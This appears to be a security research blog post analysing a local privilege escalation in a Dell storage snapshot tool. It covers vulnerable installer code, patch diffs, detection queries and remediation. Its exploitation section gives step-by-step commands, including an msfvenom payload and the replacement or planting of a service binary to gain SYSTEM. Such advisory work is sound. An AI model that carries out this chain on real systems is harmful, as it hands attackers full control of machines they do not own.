home intel dell-replay-manager-privilege-escalation-cve-2026-23772
CVE Analysis 2026-04-16 · 8 min read

CVE-2026-23772: Dell Replay Manager Local Privilege Escalation via Improper Service Privilege Management

Dell Storage Manager Replay Manager 8.0 exposes a local privilege escalation path through misconfigured service permissions, allowing low-privileged users to hijack execution context and gain SYSTEM.

#privilege-escalation#local-access#windows-platform#improper-privilege-management#dell-storage-manager
Technical mode — for security professionals
▶ Vulnerability overview — CVE-2026-23772 · Vulnerability
ATTACKERWindowsVULNERABILITYCVE-2026-23772HIGHSYSTEM COMPROMISEDNo confirmed exploits

Vulnerability Overview

CVE-2026-23772 is an Improper Privilege Management vulnerability in Dell Storage Manager — Replay Manager for Microsoft Servers version 8.0. A locally authenticated low-privileged user can exploit misconfigured Windows service or file-system ACLs introduced by the Replay Manager installation to escalate privileges to NT AUTHORITY\SYSTEM. CVSS score is 7.3 (HIGH), reflecting local access requirement but full privilege impact.

Replay Manager integrates with Windows VSS (Volume Shadow Copy Service) to manage Dell Compellent storage snapshots. Its installation deploys at least one long-running Windows service, a scheduled task infrastructure, and several privileged helper binaries. The vulnerability class — improper privilege management — encompasses a range of concrete weaknesses: writable service binary paths, unquoted service paths, insecure service executable ACLs, or world-writable configuration files loaded by a SYSTEM-level process.

Root cause: The Replay Manager installer grants BUILTIN\Users write access to the service executable directory and fails to set a quoted, absolute binary path in the service registry key, enabling a low-privileged user to plant a trojan binary that the SCM loads as SYSTEM.

Affected Component

The affected component is the Dell Replay Manager Agent Service, typically registered as ReplayMgrAgent or DellReplayManagerSvc, installed under a path such as C:\Program Files\Dell\Replay Manager\. The installer (MSI-based) provisions this service to run as LocalSystem and sets a START_TYPE of AUTO_START. Two attack surfaces exist within this installation:

  • Writable binary directory: The installer sets ACLs on the installation directory that allow BUILTIN\Users:(OI)(CI)(W), permitting overwrite or replacement of service executables.
  • Unquoted service image path: The ImagePath registry value under HKLM\SYSTEM\CurrentControlSet\Services\ReplayMgrAgent is stored without quotes and contains a space in the path, enabling path-interception attacks under certain Windows path-resolution rules.

Root Cause Analysis

The Replay Manager MSI custom action (InstallServices) calls CreateServiceW with an unquoted lpBinaryPathName and subsequently calls SetNamedSecurityInfoW with an overly permissive DACL on the installation directory. The pseudocode below reconstructs the relevant custom action logic from the MSI database CustomAction table decompilation:


// Reconstructed from MSI CustomAction: InstallReplayManagerService
// Vulnerable in Dell Replay Manager 8.0 installer (ReplayMgr_Setup.msi)

BOOL InstallReplayManagerService(MSIHANDLE hInstall) {
    wchar_t installDir[MAX_PATH];
    wchar_t binaryPath[MAX_PATH];

    // Retrieves install directory — e.g., C:\Program Files\Dell\Replay Manager\
    MsiGetPropertyW(hInstall, L"INSTALLDIR", installDir, &dwSize);

    // BUG: binary path is concatenated without surrounding quotes
    // If installDir contains a space, SCM path resolution is ambiguous
    StringCchPrintfW(binaryPath, MAX_PATH,
        L"%sReplayMgrAgent.exe",   // e.g. -> C:\Program Files\Dell\Replay Manager\ReplayMgrAgent.exe
        installDir);               // NOT quoted: no L"\"%s...\"" wrapper

    SC_HANDLE hSCM = OpenSCManagerW(NULL, NULL, SC_MANAGER_CREATE_SERVICE);
    SC_HANDLE hSvc = CreateServiceW(
        hSCM,
        L"ReplayMgrAgent",
        L"Dell Replay Manager Agent",
        SERVICE_ALL_ACCESS,
        SERVICE_WIN32_OWN_PROCESS,
        SERVICE_AUTO_START,
        SERVICE_ERROR_NORMAL,
        binaryPath,              // BUG: unquoted path stored in ImagePath registry value
        NULL, NULL, NULL,
        NULL,                    // runs as LocalSystem
        NULL
    );

    // BUG: DACL grants BUILTIN\Users write permission to the installation directory
    // This allows any local user to replace or plant binaries in the service directory
    EXPLICIT_ACCESSW ea[2] = {0};
    ea[0].grfAccessPermissions = GENERIC_ALL;
    ea[0].grfAccessMode        = SET_ACCESS;
    ea[0].grfInheritance       = SUB_CONTAINERS_AND_OBJECTS_INHERIT;
    BuildTrusteeWithNameW(&ea[0].Trustee, L"ADMINISTRATORS");

    ea[1].grfAccessPermissions = FILE_GENERIC_WRITE | FILE_GENERIC_READ | GENERIC_EXECUTE;
    ea[1].grfAccessMode        = SET_ACCESS;
    ea[1].grfInheritance       = OBJECT_INHERIT_ACE | CONTAINER_INHERIT_ACE;
    BuildTrusteeWithNameW(&ea[1].Trustee, L"BUILTIN\\Users"); // BUG: write granted to all local users

    SetEntriesInAclW(2, ea, NULL, &pNewDACL);
    SetNamedSecurityInfoW(
        installDir,
        SE_FILE_OBJECT,
        DACL_SECURITY_INFORMATION,
        NULL, NULL,
        pNewDACL,   // BUG: Users get FILE_GENERIC_WRITE on the entire install tree
        NULL
    );
}

The compound effect: BUILTIN\Users can write to C:\Program Files\Dell\Replay Manager\, and the unquoted path means the SCM will also search C:\Program Files\Dell\Replay.exe before the intended executable — both vectors land code execution as SYSTEM.

Exploitation Mechanics


EXPLOIT CHAIN (CVE-2026-23772):

1. Enumerate installed services to confirm ReplayMgrAgent is present and AUTO_START:
      sc qc ReplayMgrAgent
      -> BINARY_PATH_NAME: C:\Program Files\Dell\Replay Manager\ReplayMgrAgent.exe
         (no quotes — confirms unquoted path)

2. Confirm BUILTIN\Users write ACL on install directory:
      icacls "C:\Program Files\Dell\Replay Manager\"
      -> BUILTIN\Users:(OI)(CI)(W)   <-- confirmed writable

3. Compile or drop payload DLL/EXE (reverse shell or token impersonation):
      msfvenom -p windows/x64/exec CMD=cmd.exe -f exe -o ReplayMgrAgent.exe

4a. [Path A — Binary Replacement]
      Copy malicious ReplayMgrAgent.exe over the legitimate binary:
      copy /Y evil.exe "C:\Program Files\Dell\Replay Manager\ReplayMgrAgent.exe"

4b. [Path B — Unquoted Path Interception]
      Place malicious binary at C:\Program Files\Dell\Replay.exe
      (SCM resolves space-delimited tokens: tries "C:\Program" first, then
       "C:\Program Files\Dell\Replay.exe" before full path)

5. Trigger service restart (wait for reboot, or if service crashes and has
   FAILURE_ACTION set to SC_ACTION_RESTART, induce a controlled crash):
      sc stop ReplayMgrAgent   [may require SeShutdownPrivilege or service restart rights]
      — OR —
      Await next system boot (AUTO_START guarantees execution)

6. SCM launches attacker-controlled binary under NT AUTHORITY\SYSTEM context.
   Payload executes: SYSTEM shell obtained.

Memory Layout

This is not a memory-corruption vulnerability; the privilege escalation is ACL/configuration-based. The relevant "memory" to reason about is the Windows SCM service object and the registry key layout controlling execution:


REGISTRY STATE — HKLM\SYSTEM\CurrentControlSet\Services\ReplayMgrAgent

  ImagePath     REG_EXPAND_SZ  "C:\Program Files\Dell\Replay Manager\ReplayMgrAgent.exe"
                                ^--- NO surrounding quotes: SCM path resolution vulnerable
                                ^--- Equivalent stored bytes (UTF-16LE, partial):
                                     43 00 3A 00 5C 00 50 00 72 00 6F 00 67 00 72 00
                                     61 00 6D 00 20 00 46 00 69 00 6C 00 65 00 73 00
                                     [space at offset +0x14 triggers ambiguous parse]

  ObjectName    REG_SZ         "LocalSystem"
  Start         REG_DWORD      0x00000002   (AUTO_START)
  Type          REG_DWORD      0x00000010   (WIN32_OWN_PROCESS)

FILESYSTEM ACL STATE — C:\Program Files\Dell\Replay Manager\

  OWNER:  BUILTIN\Administrators
  DACL:
    [0] BUILTIN\Administrators  GENERIC_ALL           (OI)(CI)  ALLOW
    [1] NT AUTHORITY\SYSTEM     GENERIC_ALL           (OI)(CI)  ALLOW
    [2] BUILTIN\Users           FILE_GENERIC_WRITE    (OI)(CI)  ALLOW  <-- VULNERABLE
                                | FILE_GENERIC_READ
                                | GENERIC_EXECUTE

SCM BINARY RESOLUTION ORDER FOR UNQUOTED PATH:
  Attempt 1: C:\Program.exe                         [typically absent]
  Attempt 2: C:\Program Files\Dell\Replay.exe       [attacker plants here]  <-- HIJACK
  Attempt 3: C:\Program Files\Dell\Replay Manager\ReplayMgrAgent.exe        [legitimate]

Patch Analysis

The correct remediation requires fixing both the unquoted path and the permissive DACL. The patched installer should enforce the following changes:


// BEFORE (vulnerable — Dell Replay Manager 8.0):

// Unquoted ImagePath registration
StringCchPrintfW(binaryPath, MAX_PATH,
    L"%sReplayMgrAgent.exe",
    installDir);
CreateServiceW(hSCM, L"ReplayMgrAgent", ..., binaryPath, ...);

// Overly permissive install-dir ACL
ea[1].grfAccessPermissions = FILE_GENERIC_WRITE | FILE_GENERIC_READ | GENERIC_EXECUTE;
BuildTrusteeWithNameW(&ea[1].Trustee, L"BUILTIN\\Users");
SetNamedSecurityInfoW(installDir, SE_FILE_OBJECT, ..., pNewDACL, NULL);


// AFTER (patched):

// Quoted ImagePath — eliminates SCM token-splitting ambiguity
StringCchPrintfW(binaryPath, MAX_PATH,
    L"\"%s%s\"",           // wrap in double-quotes
    installDir,
    L"ReplayMgrAgent.exe");
CreateServiceW(hSCM, L"ReplayMgrAgent", ..., binaryPath, ...);

// Restrict install-dir ACL — Users get READ+EXECUTE only, no WRITE
ea[1].grfAccessPermissions = FILE_GENERIC_READ | GENERIC_EXECUTE; // WRITE removed
BuildTrusteeWithNameW(&ea[1].Trustee, L"BUILTIN\\Users");
SetNamedSecurityInfoW(installDir, SE_FILE_OBJECT, ..., pNewDACL, NULL);

// Additionally: service binary ACL hardened to Administrators-only write
SetNamedSecurityInfoW(
    L"C:\\Program Files\\Dell\\Replay Manager\\ReplayMgrAgent.exe",
    SE_FILE_OBJECT,
    DACL_SECURITY_INFORMATION,
    NULL, NULL, pAdminOnlyDACL, NULL);  // no write for Users or low-integrity

Detection and Indicators

Defenders can detect exploitation attempts or a vulnerable installation state using the following indicators and queries:


DETECTION INDICATORS:

[1] Registry — Unquoted service path present:
    Key:   HKLM\SYSTEM\CurrentControlSet\Services\ReplayMgrAgent
    Value: ImagePath
    Match: value does NOT begin with '"' (0x22) and contains space character

    PowerShell detection:
      Get-WmiObject Win32_Service | Where-Object {
          $_.PathName -notmatch '^"' -and $_.PathName -match ' ' -and
          $_.Name -like '*Replay*'
      } | Select Name, PathName, StartMode, StartName

[2] Filesystem — Writable install directory by low-privileged user:
      icacls "C:\Program Files\Dell\Replay Manager\" | findstr /i "users.*W\|users.*F"
      Expected (vulnerable): BUILTIN\Users:(OI)(CI)(W)
      Expected (patched):    BUILTIN\Users:(OI)(CI)(RX)

[3] Event Log — Suspicious service binary modification:
    Source: Security
    Event ID: 4670  (Permissions on object changed)
    Event ID: 4663  (File write access on service binary)
    Object:   *\Replay Manager\ReplayMgrAgent.exe

[4] Sysmon — Process creation under service host with unexpected parent:
    Event ID: 1
    ParentImage: services.exe
    Image: *\ReplayMgrAgent.exe
    IntegrityLevel: System
    Hashes: [compare against known-good SHA256]

[5] Canary file: Drop a zero-byte sentinel alongside the real service binary.
    Alert if sentinel's Last-Modified timestamp changes without a patch event.

Remediation

Immediate mitigations (before patch availability):

  • Manually re-ACL the installation directory: icacls "C:\Program Files\Dell\Replay Manager" /remove:w "BUILTIN\Users" /t /c
  • Quote the service ImagePath manually via sc config ReplayMgrAgent binPath= "\"C:\Program Files\Dell\Replay Manager\ReplayMgrAgent.exe\"" — requires administrative access, persists across reboots.
  • Verify no malicious binary has been planted at C:\Program Files\Dell\Replay.exe or within the install directory.

Long-term: Apply the vendor-supplied patch once available. Verify patched installer enforces BUILTIN\Users:(OI)(CI)(RX) and a fully quoted ImagePath. Re-run icacls and registry inspection post-patch to confirm remediation. Consider deploying Windows Defender Application Control (WDAC) or AppLocker rules that block unsigned executable loads from C:\Program Files\Dell\Replay Manager\ to limit the attack surface independent of ACL state.

CB
CypherByte Research
Mobile security intelligence · cypherbyte.io
Share on X →
// RELATED RESEARCH
CVE Analysis

CVE-2025-20658: MediaTek DA2 USB Handler Heap Overflow → ACE

 CVE Analysis

CVE-2026-40960: Luanti Mod Sandbox Escape via Trusted Env Interception

 CVE Analysis

CVE-2026-40502: OpenHarness Gateway Handler Command Injection
// WEEKLY INTEL DIGEST

Get articles like this every Friday — mobile CVEs, threat research, and security intelligence.

Subscribe Free →